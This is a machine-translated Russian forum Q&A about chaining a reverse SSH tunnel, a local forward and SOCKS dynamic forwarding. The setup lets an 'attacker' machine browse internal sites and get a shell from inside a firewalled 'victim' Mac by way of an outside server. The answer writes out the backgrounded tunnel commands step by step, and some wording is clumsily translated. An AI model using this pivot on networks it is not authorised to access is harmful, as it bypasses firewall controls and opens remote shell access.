Обратный SSH туннель w / socks

моя ситуация такова:

  • рабочий mac за брандмауэром, названный "жертвой". (High Sierra 10.13.3)
  • Ubuntu VHS в сети, названный "сервером". Что есть SSH работает на порту 2222. (Ubuntu 16.04)
  • другие Mac также за брандмауэром, названный "злоумышленник". (High Sierra 10.13.3)

Я хочу использовать socks для посещения внутренних веб-сайтов, доступных только из "жертвы".

когда я делаю ssh -R 5555:localhost:22 serv@server.com -P 2222 из 'жертвы' и ssh в "сервер" от злоумышленника и запустить ssh victim@localhost -p 5555, У меня есть доступ к оболочке от атакующего к жертве.

то, что мне нужно достичь, чтобы использовать носки для посещения веб-сайтов, доступных только из "жертвы"..

Я понимаю, что я должен настроить обратный туннель от жертвы к серверу и настроить переадресацию на сервере с входящего порта на обратный порт подключения, а также настроить переадресацию на злоумышленника с локального хоста на удаленный (который подключается к серверу), но как это сделать это?

когда я настроить носки непосредственно от злоумышленника к серверу я просто запустить ssh -D 8080 serv@server.com -p 2222 и настройки прокси socks V5 localhost: 8080 в Firefox, но я не понимаю, как я поставил вперед на сервере...

кто-нибудь может объяснить мне? Thx

2
задан jpaugh
29.04.2023 21:59 Количество просмотров материала 2450
Распечатать страницу

1 ответ

видимо, никто не может ответить на этот вопрос, это нормально, потому что я сам нашел ответ.

вот ответ:

  • On жертвой:ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • On нападающий #1: ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
  • On нападающий #2: ssh -p 4444 -D localhost:3333 user_on_victim@localhost
  • On нападающий #3: в Firefox или irc, или даже для общих настроек сети: Socks (v5) настройки прокси: 127.0.0.1 Порт 3333

каждое приложение, которое вы установили хост localhost с портом 3333 Для будет туннелироваться через серв жертве и когда вы посещаете что-то вродеhttp://myip.com вы увидите ip / хост жертвы. Здесь вы даже можете использовать GUI-приложений на нападающий (если вы настроите настройки socks для конкретного приложения или для системы в целом), которые будут туннелироваться через serv to жертвой и вы будете действуйте как жертвой как таковой.

я сделал ошибку в мой мыслительный процесс был, что я не очень понимаю как обратный схема порта выглядит, я постараюсь объяснить все простыми словами.

действий потерпевшего

ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • -N = Я не собираюсь запускать команды в оболочке
  • -f = поставить процесс в фоновом режиме (так что вы можете закрыть окно терминала)
  • -R = обратная тоннель
  • 5555:localhost:22 = 5555 это порт, на котором серв внутренне слушает положить данные вперед к порту 22 на жертвой. Если у вас есть жертва установки, чтобы ssh запускался на порту 2222, вы должны изменить 22 на 2222.
  • -p = порт на котором ssh на serv работает.

1-е действие атаки

ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>`

1-я команда, которую вы делаете на нападающий (-L 4444:localhost:5555) будет создан тоннель, так что ваш соединение с вашей 3-й командой будет туннелировано до жертвой. (Это только для приложений динамической переадресации портов / Socks)

если вы просто хотите иметь доступ к Shell на жертвой вместо этой команды вы просто ssh в серв & чем выполнить команду: 'ssh user_on_victim@localhost-p 5555'.

но нам не нужен доступ к оболочке, мы хотим туннелировать все данные динамически, поэтому мы должны сделать переадресацию портов.

или схематическое объяснение

  • -L = локальная переадресация портов (on serv)
  • - 4444:localhost:5555 поместите все данные, поступающие на порт 4444 на порт 5555.

2-е действие атаки

2-я команда, которую вы делаете на нападающий

ssh-p 4444-D localhost: 3333 user_on_victim@localhost

- это фактическая команда, которая инициализирует соединение через 2 туннеля. что вы do is you say: подключитесь к порту 4444 и поместите все данные, которые поступают (порт localhost 3333) на 4444. (который будет проходить локально на serv к порту 5555 -> который будет вытеснен к порту 22 на жертвой.

или схемы объяснения

  • -D = динамическая переадресация
  • localhost:3333 = прослушивание порта 3333 и передача данных через ssh-соединение на порт 4444 на сервер.
  • -p 4444 = порт, на котором serv слушает поставить пересылку данных в порт 5555 и чем в порт 22 на жертвой.

3-е действие атаки

Настройте свои приложения или даже всю систему для использования прокси-сервера SOCKS (v5) по адресу: localhost порт: 3333. Не имеет значения, на каких портах эти приложения работают нормально, так как они будут обрабатываться прокси-сервером. В теории каждое приложение может работать через SOCKS-прокси динамическая переадресация портов. Вам нужно только настроить его. :)

3-е действие на нападающий это фактические данные, которые вы собираетесь туннелировать в жертвой. Это не имеет значения, какие данные или приложения это, вот почему это динамическая пересылка, это не имеет значения, на каких портах эти приложения работают, потому что это будет обрабатываться SOCKS.

я надеюсь, что кто-то находит применение в моем объяснении.

хорошего дня....

1
отвечен iz0r 2023-05-01 05:47

Постоянная ссылка на данную страницу: [ Скопировать ссылку | Сгенерировать QR-код ]

Ваш ответ

Опубликуйте как Гость или авторизуйтесь

Имя
Вверх